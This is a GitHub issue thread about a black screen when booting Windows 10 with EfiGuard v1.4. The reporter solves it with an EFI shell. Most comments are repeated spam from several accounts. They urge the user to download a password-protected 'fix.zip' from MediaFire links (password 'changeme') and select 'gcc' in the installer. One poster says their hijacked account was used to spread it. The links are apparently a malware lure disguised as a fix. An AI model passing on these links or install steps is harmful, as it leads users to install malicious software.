### ISSUE TITLE
blackscreen issue windows10

### ISSUE THREAD

**Issue by 2memory333** [Mattiwatti/EfiGuard#130]
### Operating system

Windows10 x64 21H1

### Issue description

 i have a problem with efiguard v1.4,

i created bootable usb, and put bootx64.efi, EfiGuardDxe.efi files in it.

I booted my computer with that usb and i saw all texts, everything went well...

However, after these things i saw loading circle then i got blackscreen. It didnt boot windows, but all i got was black screen

Im using Windows10 21H1 (Gigabyte motherboard)

Does someone know why im getting blackscreen? Is it because my windows version? Do i have to make some changes at bios? "

### Steps to reproduce

1. 
2.

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 2memory333** [comment]
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."
 thank you for your interest but i solved my issue by installing driver with efi shell.

**Comment by 2memory333** [comment]
i used efi sheel issue fixed..

**Comment by nxllxvxxd** [comment]
> > Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."
> > thank you for your interest but i solved my issue by installing driver with efi shell.

thank god you didn't download that my account was compromised and i just found out they have been using it to try to spread it to other people

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
